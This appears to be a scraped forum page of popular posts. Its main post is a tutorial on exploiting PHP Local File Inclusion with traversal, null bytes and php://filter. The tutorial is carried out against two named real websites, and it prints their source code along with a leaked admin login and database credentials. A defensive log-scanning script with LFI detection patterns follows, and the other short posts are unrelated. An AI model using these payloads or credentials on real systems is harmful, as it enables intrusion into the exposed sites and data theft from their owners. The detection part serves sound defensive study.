Leaderboard
Popular Content
Showing content with the highest reputation on 12/08/13 in all areas
-
In this tutorial you will learn the php://filter method for exploiting an LFI.

What LFI is: LFI, or Local File Inclusion, means using PHP's include function in an improper way; through an LFI we can include (not just fetch the source of) and execute the PHP code of any page on the server.

How to find an LFI: an LFI usually shows up in this form: site.com/index.php?page=ceva.php. If we put something after site.com/index.php?page=ceva.php; we get an error like this: http://s24.postimg.org/u93f51bth/lfi2.png The error says that PHP cannot include a file that does not exist. Using ../ (one directory up) we can walk through the folders and include any file on the server: site.com/index.php?page=../etc/passwd

Using the null byte character: it is used when the PHP script appends an extension (usually .php, .html, .txt) to the parameter it receives. The null byte character %00 "cancels" the extension that follows the parameter, and it is used like this: site.com/index.php?page=../etc/passwd%00

Now that I have given a short introduction to the term LFI, I will present the php://filter method. Suppose you have an LFI on a site: you can pull /etc/passwd, but you cannot find any log file, and the php://input method does not work. There is still one more way to exploit an LFI: the php://filter method. With this method we can turn an LFI into a source code disclosure, that is, we can read the source of the files on the server.

We have the following LFI: site.com/index.php?page=../etc/passwd http://s9.postimg.org/ipogmj0gf/lfi1.png Suppose we have no access to the logs and cannot turn the LFI into remote code execution; we will try the php://filter method.

The php://filter method is used like this: site.com/index.php?page=php://filter/convert.base64-encode/resource=FISIER where FISIER is the name of the file you want to read. What does the instruction php://filter/convert.base64-encode/resource=FISIER do? It tells the include function to take the contents of the page FISIER, encode it in base64 and display it. This instruction only works on scripts that use the include function as the entry point, and only those that have nothing else in front of the injected parameter (such as include('pages'.$_REQUEST['page'])). The result will be the following; I read the index.php file itself: http://s24.postimg.org/hx9pj12qd/lfi3.png The page gives us the contents of the source page encoded in base64, and with a decoder we can obtain the contents of the source page.

Applicability: what can be done with this method :-/ Well, we can get hold of the login credentials for administration panels or databases. We have the following site: Sportstudio Bodyworld Schkeuditz bei Leipzig http://s23.postimg.org/ta0365agb/lfi4.png We will test the php://filter method and read the source of index.php: Sportstudio Bodyworld Schkeuditz bei Leipzig http://s21.postimg.org/x2fgrchg7/lfi5.png What we obtained is:
Decoded, it is:

```php
<?php
  include("user.php");
  $PHPSESSID = $_REQUEST["PHPSESSID"];
  $page = $_REQUEST["page"];          // taken straight from the request
  $benutzername = $_REQUEST["benutzername"];
  $passwort = $_REQUEST["passwort"];
  $login = $_REQUEST["login"];
  $logout = $_REQUEST["logout"];
  $senden = $_REQUEST["senden"];
  $datei = $_REQUEST["datei"];

  If ($benutzername && $passwort)
    If ($benutzername === $user && $passwort === $pass) {
      session_start();
      header("Location: index.php?page=login.php&login=ok");
    }
    else {
      header("Location: index.php?page=login.php&login=falsch");
    }
  else {
    If ($PHPSESSID) {
      session_start($PHPSESSID);
    }
  }
  If ($senden) {
    If ($senden=="Ja") {
      $bild = $_REQUEST["bild"];
      If ($bild) {
        @unlink("./news_pics/$bild");
      }
      @unlink($datei);
      header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei");
    }
    elseif ($senden=="Nein") {
      header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei");
    }
  }
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sportstudio Bodyworld Schkeuditz bei Leipzig</title>
<meta name="DC.Title" content="pc4user.de - webdesign - webtec">
<meta name="DC.Creator" content="Detlev Liebing">
<meta name="DC.Subject" content="Sport, Fitness, Fitness-Studio, Freizeit, Solarium, Sauna, Bodyworld, Sportstudio">
<meta name="DC.Description" content="pc4user.de - webdesign - webtec">
<meta name="DC.Publisher" content="pc4user">
<meta name="DC.Contributor" content="Detlev Liebing">
<meta name="DC.Date" content="2009-01-15">
<meta name="DC.Type" content="Text">
<meta name="DC.Format" content="text/html">
<meta name="DC.Identifier" content="http://www.pc4user.de">
<meta name="DC.Source" content="">
<meta name="DC.Language" content="de">
<meta name="DC.Relation" content="Startseite">
<meta name="DC.Coverage" content="Leipzig">
<meta name="DC.Rights" content="Alle Rechte liegen bei pc4user-Detlev Liebing">
<meta name="robots" content="index">
<meta name="robots" content="follow">
<meta name="keywords" lang="de" content="">
<meta name="keywords" lang="en-us" content="">
<meta name="keywords" lang="en" content="">
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css">
<meta http-equiv="expires" content="0">
<link rel="stylesheet" href="style.css">
</head>

<body topmargin=0 leftmargin=0 rightmargin=0 bottommargin=0>
<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td width=990 height=239>
<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td width=990 height=33 colspan=2>
<!--- horizontale oberste hauptnavigation--->
<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td width=150 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="150" height="33" border="0"></a></td>
<td width=84 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="84" height="33" border="0"></a></td>
<td width=111 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="111" height="33" border="0"></a></td>
<td width="647" background="gfx/oeffnungszeiten.jpg"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td width=563 height=206 background="gfx/mittelheaderlinks.jpg" valign=top>
<table width=563 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td rowspan=4 width=443 height=170> </td>
<td width=120 height=79> </td>
</tr>
<tr>
<td width=120><a href="index.php?page=home.php"><img src="gfx/service.gif" alt="" width="121" height="23" border="0"></a></td>
</tr>
<tr>
<td width=120><a href="index.php?page=service.php"><img src="gfx/service.gif" alt="" width="121" height="32" border="0"></a></td>
</tr>
<tr><td width=120><a href="index.php?page=kontakte.php"><img src="gfx/kontakte.gif" alt="" width="121" height="36" border="0"></a></td>
</tr>
<tr>
<td colspan=2 width=563 height=36>
<!-- untere horizontale hauptnavi-->
<table width=563 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td width=110><a href="index.php?page=home.php"><img src="gfx/home.gif" alt="" width="72" height="36" border="0"></a></td>
<td wuidth=72><a href="index.php?page=anfahrt.php"><img src="gfx/anfahrt.gif" alt="" width="110" height="36" border="0"></a></td>
<td width=127><a href="index.php?page=angebot.php"><img src="gfx/angebot.gif" alt="" width="115" height="36" border="0"></a></td>
<td width=140><a href="index.php?page=kontakt.php"><img src="gfx/kontakt.gif" alt="" width="127" height="36" border="0"></a></td>
<td width=115><a href="index.php?page=impressum.php"><img src="gfx/impressum.gif" alt="" width="140" height="36" border="0"></a></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<!-- rechter headerteil mitte (logo)-->
<td width=427 height=206 background="gfx/mittelheaderrechts.jpg"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td height=71 width=990 style="background-image:url(gfx/unterheader.jpg); background-repeat:no-repeat" valign=top>
<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<!-- newsheader --->
<td width=400 height=71 valign="bottom">
<table id="ueber">
<tr>
<td width=190> </td>
<td width=210> News </td>
</tr>
</table>
</td>
<!-- ueberschrift des jeweiligen inhaltes -->
<td width=590 align="left" valign="bottom">
<table id="ueber">
<tr>
<td width=30> </td>
<td width=560> <?php include("ueberschriften.php"); ?> </td>
</tr>
</table>
</td>
</tr>
<tr>
<!-- news --->
<td width=400 valign="top">
<!-- an dieser stelle php aus datenbank-->
<table>
<tr>
<td valign="top"> <?php include("news.php") ?> </td>
</tr>
</table>
</td>
<!-- jeweiliger inhalt -->
<td width=590 valign="top">
<table width=590 id="main">
<tr>
<td width=45> </td>
<td valign="top" width=560>
<?php
  // only the substrings "http", "www" and "ftp" are rejected; php://filter and ../ pass through
  If (strpos($_REQUEST["page"], "http") === 0 || strpos($_REQUEST["page"], "http") > 0) { $page="home.php"; };
  If (strpos($_REQUEST["page"], "www") === 0 || strpos($_REQUEST["page"], "www") > 0) { $page="home.php"; };
  If (strpos($_REQUEST["page"], "ftp") === 0 || strpos($_REQUEST["page"], "ftp") > 0) { $page="home.php"; };
  If ($page) { include($page); }
  else { include("home.php"); }
?>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
```

In the source we see the following instruction: include('user.php'); Now we will read the user.php page: http://www.bodyworld-schkeuditz.de/index.php?page=php://filter/convert.base64-encode/resource=user.php What we obtained: PD9waHANCg0KICAkdXNlciA9ICJjYW1pYmIiOw0KICAkcGFzcyA9ICJjYW1pYmIiDQoNCg0K Decoded: $user = "camibb"; $pass = "camibb" We go to the
login.php page and log in with the data above (not much can be done there; it is just a proof of concept). Another example: Impresariat Alwernia - Andrzej Grabowski Show http://s17.postimg.org/9q9g8rn7z/lfi6.png We will read index.php: http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://s27.postimg.org/5hgc3dkg3/lfi7.png What we obtained:
Decoded:

```php
<head>
<TITLE>Impresariat Alwernia - Andrzej Grabowski Show</TITLE>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-2">
<META name="robots" content="index,follow,all">
<META name="revisit-after" content="2 days">
<META name="title" content="Impresariat Alwernia - Andrzej Grabowski Show">
<META name="keywords" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogusław, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa"><!-- Alwernia, Grabowski -->
<META name="description" content="Andrzej Grabowski Show - Grabowscy.Com. Agencja impresaryjna Alwernia. Tylko najlepsze spektakle. Impresariat Alwernia - Andrzej Grabowski Show"><!-- Alwernia, Grabowski -->
<META name="abstract" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogusław, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa">
<META name="author" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogusław, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa">
<META HTTP-EQUIV="Content-Language" CONTENT="pl">
<script language="JavaScript" src="js/skrypt.js"></script>
<style type="text/css">
<!--
body {
	background-color: #355C91;
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style></head>

<body>
<table class="tabelazewnetrzna" border=0 cellpadding=0 cellspacing=0>
<tr>
<td>
<TABLE border=0 class="tabelawewnetrzna" cellpadding=0 cellspacing=0>
<TR>
<TD colspan="3"><?include("header_center.htm")?></TD>
</TR>
<TR>
<td class="leftbackground" valign="top"><?include("left.htm")?></TD>
<td class="center" valign="top">
<?
  // ---------------------------------------------------------------
  require_once ("admin/data_base.class");
  $connid = new DataBaseConnect();
  // ---------------------------------------------------------------
  include ('newsy/engine.php3');

  $page    = $_GET['page'];
  $subpage = $_GET['subpage'];
  $parent  = $_GET['parent'];
  $pid     = $_GET['pid'];

  if (!$page)
    include ('center.htm');
  else if ($page == 'newsy' && $subpage == 'showall')
    include ('newsy/newsy.php3');
  else if ($page == 'newsy' && $subpage == 'show')
    include ('newsy/news.php3');
  else if ($page == 'strona')
    include ('newsy/strona.php3');
  else
    include ($page);   // any other ?page= value is included as-is
?>
</td>
<td class="rightbackground" valign="top"><?include("newsy/polecamy.php3")?></TD>
</TR>
<TR>
<td class="footerbackgroundleft"><?include("footer_left.htm")?></TD>
<td class="footerbackground"><?include("footer_center.htm")?></TD>
<td class="footerbackgroundright"><?include("footer_right.htm")?></TD>
</TR>
</table>
</td>
</tr>
</table>
</body>
</html>
```

What is interesting in the source page is admin/data_base.class, and we will read its source: http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=admin/data_base.class From there we obtained the base64 output, which decoded is:

```php
<?
class DataBaseConnect
{
  var $mysqlidconn;
  var $databasename;
  var $results;
  var $tablename;

  function DataBaseConnect()
  {
    // $mysql_host = "localhost";
    // $mysql_user = "root";
    // $mysql_pass = "";
    $mysql_host = "localhost";
    $mysql_user = "grabowscy";
    $mysql_pass = "qHInJi4o";
    $mysql_db_name = "grabowscy";
    $nazwa_tabeli = "grabowscy_";
    $id_conn = @Mysql_select_db($mysql_db_name) or die('<span style="font-family: Verdana; font-size: 13px"><b>Problem z dostępem do bazy danych.</b>');
    $this -> mysqlidconn = $id_conn;
    $this -> databasename = $mysql_db_name;
    $this -> tablename = $nazwa_tabeli;
  }

  function CheckTableExists($table)
  {
    $this->results = mysql_db_query($this->databasename, "SELECT 1 FROM `$table` LIMIT 0", $this->mysqlidconn);
    return $this->results;
  }

  function QueryToDataBase($query)
  {
    $this->results = mysql_query($query) or die("Problem z dostępem do bazy danych. ".$query);
    return $this->results;
  }
}
?>
```

And voilà: $mysql_user = "grabowscy"; $mysql_pass = "qHInJi4o"; $mysql_db_name = "grabowscy"; From here you can get access to the database, to the administration panel and a shell :D. These examples were given only to demonstrate the impact of the vulnerability. That is all I had to say; I hope the tutorial was useful to you. Have a nice day :D.
1 point
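What a defender would look for, as an added example that is not part of the original post: a small Python scanner over constructed Apache-style access log entries that flags the php://filter, ../ and %00 probes described in the tutorial, and mirrors the strpos() deny-list from the dumped index.php to show that it never catches them (the log lines and the client address are constructed; nothing here is the site's own code).

```python
"""Flag LFI / php://filter probes in web-server access logs (added example)."""
from __future__ import annotations
import re
from urllib.parse import parse_qs

# Substrings the dumped index.php tests with strpos() before calling include($page).
LEGACY_DENY = ("http", "www", "ftp")

def legacy_check_blocks(page: str) -> bool:
    """Mirror of the dumped site's check: it falls back to home.php only when the
    page parameter contains one of the deny-listed substrings, so php://filter
    and ../ traversal pass straight through to include()."""
    return any(word in page for word in LEGACY_DENY)

# Indicators from the tutorial, matched against the URL-decoded `page` value.
PROBES = {
    "php_wrapper": re.compile(r"^php://", re.I),                        # php://filter, php://input
    "filter_b64": re.compile(r"^php://filter/.*convert\.base64-encode", re.I),
    "traversal": re.compile(r"(^|[\\/])\.\.(?=[\\/]|$)"),               # ../ segments
    "null_byte": re.compile(r"\x00"),                                    # %00 after decoding
}

# Apache combined-log prefix: client ident user [time] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def page_param(target: str) -> str | None:
    """Return the URL-decoded `page` query value of a request target, or None."""
    query = target.partition("?")[2]
    values = parse_qs(query, keep_blank_values=True).get("page")
    return values[0] if values else None

def classify(page: str) -> list[str]:
    """Names of every probe pattern that matches the decoded page value."""
    return [name for name, rx in PROBES.items() if rx.search(page)]

def scan_access_log(lines) -> list[dict]:
    """One record per request whose page parameter looks like an LFI probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        page = page_param(m.group("target"))
        if page is None:
            continue
        tags = classify(page)
        if tags:
            hits.append({"ip": m.group("ip"), "status": m.group("status"),
                         "page": page, "tags": tags,
                         "legacy_blocked": legacy_check_blocks(page)})
    return hits

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Dec/2013:10:00:01 +0200] "GET /index.php?page=home.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Dec/2013:10:00:07 +0200] "GET /index.php?page=../etc/passwd%00 HTTP/1.1" 200 1877 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Dec/2013:10:00:15 +0200] "GET /index.php?page=php://filter/convert.base64-encode/resource=user.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], repr(hit["page"]), hit["tags"], "legacy deny-list blocked:", hit["legacy_blocked"])
```

A 200 status on a flagged request is the signal that the include actually succeeded, which is what separates a probe from a disclosure.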
-
I decided to post here a list of several sites for analyzing malware and URLs, plus online antivirus scanners. I hope it is useful to you :)

Malware Scan
http://www.virustotal.com/ [File and Website]
Jotti's malware scan
Anubis: Analyzing Unknown Binaries
VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 37 AntiVirus Engines!
ThreatExpert - Online File Scanner
Public Sandbox - Submit a Sample for Malware Analysis
Eureka Malware Analysis Page
Wepawet - Home [File and Website]
https://www.metascan-online.com/
Xandora - Your Online Binary Analyser
Free Online Multi Engine Antivirus File and URL Scanner - Powered by NoVirusThanks.org [File and Website]
Irish Cream Service - Free Antivirus Scan Service [File and Website]
ScanThis! Free online virus scanner [File and Website]
Zscaler Zulu URL Risk Analyzer - Zulu
Website Scan Automated Exploit Analysis
Online Virus Scanner - Scan Links for Malware, Trojans and Viruses
Sucuri SiteCheck - Free Website Malware Scanner
Online Webpage Scanning for Malware Attacks | Web Inspector Online Scan
urlquery.net - Free URL scanner
Servicio de seguridad web, desenmascarame
Scan websites for exploits, malware and other malicious threats using multiple web reputation engines and domain blacklists
jsunpack - a generic JavaScript unpacker [Website, Javascript, PDF, HTML and pcap]
Website/URL/Link Scanner Safety Check for Phishing, Malware, Viruses - ScanURL.net
AVG Online Virus Scanner | Scan Web Pages | AVG LinkScanner Drop Zone
FREE Online Website Malware Scanner | Website Security Monitoring & Malware Removal | Quttera
Dr.Web online scanners
https://www.trustedsource.org/?p=mcafee
UrlScan 3.1 : The Official Microsoft IIS Site
UnThreat Online Scanner

Antivirus Online
http://quickscan.bitdefender.com/ro/
Free Online Virus Scan - Bitdefender Online Virus Scanner
ESET Free Online Scanner :: Complete Malware Detection :: ESET
Emsisoft Web Malware Scan | Dual-Engine Browser Scanner - Free removal of Viruses, Bots, Spyware, Keyloggers, Trojans and Rootkits
Free Online Virus Scan - Antivirus Software - Trend Micro USA
Panda Activescan | Free Online Antivirus | Free Virus Disinfection - Panda Security
https://www.grc.com/x/ne.dll?bh0bkyd2
:: WindowSecurity.com
How To - Remove threats - Removal Tools | F-Secure
Rising Online Virus Scanner
FREE ANTIVIRUS online: ActiveScan 2.0 - PANDA SECURITY
https://security.symantec.com/sscv6/GetBrowser.asp?pkj=QTHYGXMQPHPUCCBMMHL&langid=ie&venid=sym&plfid=00&from=/sscv6/home.asp
PC Flank: Make sure you're protected on all sides.

Source: cleanbytes.net/malware-online-scanners
0 points
-
I consider that the program does not live up to my expectations, that it is deprecated, that its design is not good enough, and that it can be done better. Until I have time to make another version, this project is completely abandoned. In a future version, if there is one, everything will be rewritten from scratch in a more professional style. Closed!
-1 points
-
1. Loan-sharking 2. Take some courses, something that helps you find a good job, or helps in a possible future business. 3. Go see the world, trips, etc. PS: all of these assume you already have the necessary minimum of comfort: teeth in good condition, civilized living conditions, a decent PC/laptop.
-1 points
-
Try it yourselves: give a missed call or call this number 07 and you will see that you receive messages daily, and when you call it someone answers and only says "hello, hello, I can't hear you", repeating these words until you get tired of listening and hang up the phone. What can it be?? I don't think it is voicemail.
-1 points